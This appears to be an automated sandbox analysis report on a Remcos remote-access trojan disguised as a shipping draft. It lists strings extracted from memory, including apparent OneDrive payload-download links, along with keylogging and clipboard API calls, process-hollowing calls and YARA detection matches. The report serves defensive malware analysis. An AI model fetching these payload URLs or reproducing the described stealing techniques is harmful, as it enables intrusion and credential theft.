Source: xkn.exe, 0000000E.00000002.1720907085.000001F43AF95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: bhv5415.tmp.36.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: bhv5415.tmp.36.dr String found in binary or memory: http://www.digicert.com/CPS0~
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000026.00000002.1834443495.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000026.00000003.1834264521.00000000005ED000.00000004.00000020.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000026.00000003.1834180917.00000000005ED000.00000004.00000020.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000026.00000002.1834443495.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.com
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000026.00000002.1834443495.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000026.00000002.1834443495.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.imvu.comr
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000026.00000003.1834264521.00000000005ED000.00000004.00000020.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000026.00000003.1834180917.00000000005ED000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.imvu.comta
Source: bhv5415.tmp.36.dr String found in binary or memory: http://www.msftconnecttest.com/connecttest.txt?n=1696334965379
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000024.00000002.1865730661.0000000000193000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000026.00000002.1834443495.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.nirsoft.net/
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4094108405.00000000022F6000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1791549862.000000002754C000.00000004.00000020.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4110547668.00000000264F0000.00000004.00001000.00020000.00000000.sdmp, glrkszlG.pif, glrkszlG.pif, 00000001.00000000.1681332436.0000000000416000.00000002.00000001.01000000.00000005.sdmp, glrkszlG.pif, 00000001.00000002.1772834423.000000000044B000.00000040.00000400.00020000.00000000.sdmp, glrkszlG.pif, 00000001.00000002.1772834423.0000000000400000.00000040.00000400.00020000.00000000.sdmp, glrkszlG.pif, 00000001.00000001.1681718586.0000000000418000.00000040.00000001.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1898092311.000000007FC80000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1857638446.0000000002456000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1859693106.0000000002A20000.00000040.00001000.00020000.00000000.sdmp, glrkszlG.pif.0.dr String found in binary or memory: http://www.pmail.com
Source: bhv5415.tmp.36.dr String found in binary or memory: https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437
Source: bhv5415.tmp.36.dr String found in binary or memory: https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8d
Source: bhv5415.tmp.36.dr String found in binary or memory: https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03
Source: bhv5415.tmp.36.dr String found in binary or memory: https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7
Source: bhv5415.tmp.36.dr String found in binary or memory: https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5
Source: bhv5415.tmp.36.dr String found in binary or memory: https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742
Source: bhv5415.tmp.36.dr String found in binary or memory: https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fcc
Source: bhv5415.tmp.36.dr String found in binary or memory: https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367d
Source: bhv5415.tmp.36.dr String found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=W
Source: bhv5415.tmp.36.dr String found in binary or memory: https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326
Source: bhv5415.tmp.36.dr String found in binary or memory: https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68
Source: bhv5415.tmp.36.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
Source: bhv5415.tmp.36.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
Source: bhv5415.tmp.36.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
Source: bhv5415.tmp.36.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
Source: bhv5415.tmp.36.dr String found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
Source: xkn.exe, 0000000E.00000002.1720907085.000001F43AF49000.00000004.00000800.00020000.00000000.sdmp, xkn.exe, 0000000E.00000002.1720907085.000001F43AF6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: bhv5415.tmp.36.dr String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: bhv5415.tmp.36.dr String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4092451794.0000000000929000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://c6c4bq.db.files.1drv.com/_wR;
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680814338.0000000000971000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://c6c4bq.db.files.1drv.com/y4mMjDna1hFKlb3gcMt7CCWqdkVpW0DS9Rs52USyRQhNgPBhPdYAV7L6hMIv9WCXM5X
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4092451794.000000000097D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://c6c4bq.db.files.1drv.com/y4muza8-AaN89J3KOPjgz4xuHsRw8GpbmeCTYrNNV8GxQvY6QuZ4f4Rksz00DRpN4rZ
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4092451794.0000000000929000.00000004.00000020.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680814338.0000000000971000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://c6c4bq.db.files.1drv.com:443/y4mMjDna1hFKlb3gcMt7CCWqdkVpW0DS9Rs52USyRQhNgPBhPdYAV7L6hMIv9WC
Source: bhv5415.tmp.36.dr String found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
Source: bhv5415.tmp.36.dr String found in binary or memory: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpX
Source: bhv5415.tmp.36.dr String found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
Source: bhv5415.tmp.36.dr String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: bhv5415.tmp.36.dr String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Fr
Source: bhv5415.tmp.36.dr String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&Fr
Source: bhv5415.tmp.36.dr String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFD
Source: bhv5415.tmp.36.dr String found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?99bdaa7641aea1439604d0afe8971477
Source: bhv5415.tmp.36.dr String found in binary or memory: https://fp-afd-nocache-ccp.azureedge.net/apc/trans.gif?bc7d158a1b0c0bcddb88a222b6122bda
Source: bhv5415.tmp.36.dr String found in binary or memory: https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8
Source: bhv5415.tmp.36.dr String found in binary or memory: https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950c
Source: bhv5415.tmp.36.dr String found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?4be9f57fdbd89d63c136fa90032d1d91
Source: bhv5415.tmp.36.dr String found in binary or memory: https://fp-vp-nocache.azureedge.net/apc/trans.gif?e5772e13592c9d33c9159aed24f891a7
Source: bhv5415.tmp.36.dr String found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?a6aceac28fb5ae421a73cab7cdd76bd8
Source: bhv5415.tmp.36.dr String found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?b57fe5cd49060a950d25a1d237496815
Source: bhv5415.tmp.36.dr String found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?2f6c563d6db8702d4f61cfc28e14d6ba
Source: bhv5415.tmp.36.dr String found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?3dacce210479f0b4d47ed33c21160712
Source: bhv5415.tmp.36.dr String found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?7e0e9c3a9f02f17275e789accf11532b
Source: bhv5415.tmp.36.dr String found in binary or memory: https://fp-vs-nocache.azureedge.net/apc/trans.gif?81f59f7d566abbd2077a5b6cdfd04c7b
Source: bhv5415.tmp.36.dr String found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?3c5bdbf226e2549812723f51b8fe2023
Source: bhv5415.tmp.36.dr String found in binary or memory: https://fp-vs.azureedge.net/apc/trans.gif?c50299ad5b45bb3d4c7a57024998a291
Source: bhv5415.tmp.36.dr String found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4092451794.00000000008FB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://live.com/
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000002.4092451794.00000000008FB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://live.com/d
Source: bhv5415.tmp.36.dr String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: bhv5415.tmp.36.dr String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000024.00000003.1864575924.0000000000A5D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.liv
Source: bhv5415.tmp.36.dr String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: bhv5415.tmp.36.dr String found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3
Source: bhv5415.tmp.36.dr String found in binary or memory: https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-ae
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe String found in binary or memory: https://login.yahoo.com/config/login
Source: bhv5415.tmp.36.dr String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
Source: bhv5415.tmp.36.dr String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_sKiljltKC1Ne_Y3fl1HuHQ2.css
Source: bhv5415.tmp.36.dr String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_BxKM4IRLudkIao5qo
Source: bhv5415.tmp.36.dr String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
Source: bhv5415.tmp.36.dr String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_AI1nyU_u3YQ_at1fSBm4Uw2.js
Source: bhv5415.tmp.36.dr String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
Source: bhv5415.tmp.36.dr String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
Source: bhv5415.tmp.36.dr String found in binary or memory: https://maps.windows.com/windows-app-web-link
Source: bhv5415.tmp.36.dr String found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
Source: bhv5415.tmp.36.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=27ff908e89d7b6264fde
Source: bhv5415.tmp.36.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=586ba6
Source: bhv5415.tmp.36.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=7ccb04
Source: bhv5415.tmp.36.dr String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=b1ed69
Source: glrkszlG.pif, 00000001.00000002.1772834423.00000000004B1000.00000040.00000400.00020000.00000000.sdmp, glrkszlG.pif, 00000001.00000001.1681718586.00000000004A3000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: https://onedrive.live.com/download?resid=7E01B4B465D32A9A%213365&authkey=
Source: bhv5415.tmp.36.dr String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816d
Source: bhv5415.tmp.36.dr String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbad
Source: bhv5415.tmp.36.dr String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8
Source: bhv5415.tmp.36.dr String found in binary or memory: https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135
Source: bhv5415.tmp.36.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
Source: bhv5415.tmp.36.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
Source: bhv5415.tmp.36.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
Source: bhv5415.tmp.36.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
Source: bhv5415.tmp.36.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
Source: bhv5415.tmp.36.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-0debb885be07c402c948.js
Source: bhv5415.tmp.36.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
Source: bhv5415.tmp.36.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ec3581b6c9e6e9985aa7.chunk.v7.js
Source: bhv5415.tmp.36.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
Source: bhv5415.tmp.36.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.6c288f9aff9797959103.chunk.v7.js
Source: bhv5415.tmp.36.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.9ba2d4c9e339ba497e10.chunk.v7.js
Source: bhv5415.tmp.36.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-1652fd8b358d589e6ec0.js
Source: bhv5415.tmp.36.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.52c45571d19ede0a7005.chunk.v7.j
Source: bhv5415.tmp.36.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.d918c7fc33e22b41b936.chunk.v7.c
Source: bhv5415.tmp.36.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
Source: bhv5415.tmp.36.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
Source: bhv5415.tmp.36.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
Source: bhv5415.tmp.36.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
Source: bhv5415.tmp.36.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
Source: bhv5415.tmp.36.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
Source: bhv5415.tmp.36.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
Source: bhv5415.tmp.36.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
Source: bhv5415.tmp.36.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
Source: bhv5415.tmp.36.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
Source: bhv5415.tmp.36.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
Source: bhv5415.tmp.36.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
Source: bhv5415.tmp.36.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
Source: bhv5415.tmp.36.dr String found in binary or memory: https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993
Source: bhv5415.tmp.36.dr String found in binary or memory: https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680443569.000000007F330000.00000004.00001000.00020000.00000000.sdmp, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000000.00000003.1680180079.000000007EDE0000.00000004.00001000.00020000.00000000.sdmp, Glzskrlg.PIF, 00000027.00000002.1895380898.000000007F2D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: bhv5415.tmp.36.dr String found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2
Source: bhv5415.tmp.36.dr String found in binary or memory: https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59
Source: bhv5415.tmp.36.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000026.00000002.1834443495.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: bhv5415.tmp.36.dr String found in binary or memory: https://www.office.com/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown HTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.4:49731 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_2794A2B8 SetWindowsHookExA 0000000D,2794A2A4,00000000 0_2_2794A2B8
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_2794B70E OpenClipboard,GetClipboardData,CloseClipboard, 0_2_2794B70E
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 36_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, 36_2_0040987A
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 36_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 36_2_004098E2
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 37_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 37_2_00406DFC
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 37_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard, 37_2_00406E9F
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_2794A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx, 0_2_2794A3E0
Source: Yara match File source: Process Memory Space: Glzskrlg.PIF PID: 7780, type: MEMORYSTR

E-Banking Fraud

Source: Yara match File source: 39.2.Glzskrlg.PIF.26e20000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 39.2.Glzskrlg.PIF.26e20000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000027.00000002.1894385900.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4092451794.000000000097D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4092451794.0000000000929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.1856524613.0000000000796000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.1879306334.0000000026E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000002.1933047287.000000000078C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe PID: 7252, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Glzskrlg.PIF PID: 7780, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Glzskrlg.PIF PID: 7804, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_2795C9E2 SystemParametersInfoW, 0_2_2795C9E2
Source: C:\Users\Public\xkn.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\Public\xkn.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShell
Source: C:\Users\Public\xkn.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

System Summary

Source: 39.2.Glzskrlg.PIF.26e20000.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 39.2.Glzskrlg.PIF.26e20000.3.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 39.2.Glzskrlg.PIF.26e20000.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 39.2.Glzskrlg.PIF.26e20000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 39.2.Glzskrlg.PIF.26e20000.3.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 39.2.Glzskrlg.PIF.26e20000.3.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000027.00000002.1894385900.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000027.00000002.1879306334.0000000026E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: 00000027.00000002.1879306334.0000000026E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000027.00000002.1879306334.0000000026E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 00000000.00000002.4114575191.00000000279AB000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe PID: 7252, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: Process Memory Space: Glzskrlg.PIF PID: 7780, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe Code function: 0_2_028B81B8 CreateProcessAsUserW,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,Wow64SetThreadContext,NtResumeThread, 0_2_028B81B8
